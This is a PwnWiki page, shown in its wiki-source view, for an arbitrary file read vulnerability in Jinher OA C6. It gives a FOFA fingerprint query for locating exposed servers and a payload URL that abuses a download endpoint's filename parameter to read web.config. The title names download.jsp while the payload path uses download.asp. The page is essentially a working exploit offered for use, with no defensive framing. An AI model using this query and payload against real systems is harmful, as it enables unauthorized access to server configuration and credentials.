View source for 金和OA C6 download.jsp 任意文件讀取漏洞

From PwnWiki

← 金和OA C6 download.jsp 任意文件讀取漏洞

You do not have permission to edit this page, for the following reasons:

The action you have requested is limited to users in the group: Users.
You must confirm your email address before editing pages. Please set and validate your email address through your user preferences.

You can view and copy the source of this page.

<languages />
<translate>
==漏洞影響==

金和OA
</translate>

==FOFA==
<pre>
app="Jinher-OA"
</pre>

==Payload==
<pre>
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
</pre>

<translate>
讀取web.config
</translate>
<pre>
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
</pre>

Return to 金和OA C6 download.jsp 任意文件讀取漏洞.

Retrieved from "https://pwnwiki.com/index.php?title=金和OA_C6_download.jsp_任意文件讀取漏洞"